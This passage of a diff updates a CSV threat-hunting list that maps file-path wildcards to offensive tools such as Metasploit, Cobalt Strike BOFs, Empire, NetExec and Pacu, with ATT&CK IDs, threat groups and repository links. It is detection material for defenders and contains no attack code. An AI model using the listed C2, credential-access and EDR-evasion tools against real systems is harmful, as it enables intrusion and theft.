TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ELFLoader/*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/email_spoof_checks.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/EmailAll.git*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" 
@@ -3472,25 +3482,28 @@ "*/Empire.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/empire/client/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - 
T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/empire:latest*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" 
+"*/empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/EmpireProject*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enable-user.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/enableuser/enableuser.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/enableuser/enableuser.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/enum__secrets/*.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/enum_av.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_av.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/enum_cisco.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/enum_domain_info*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/enum_f5.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_juniper.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_proxy.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_services.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/enum_shares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
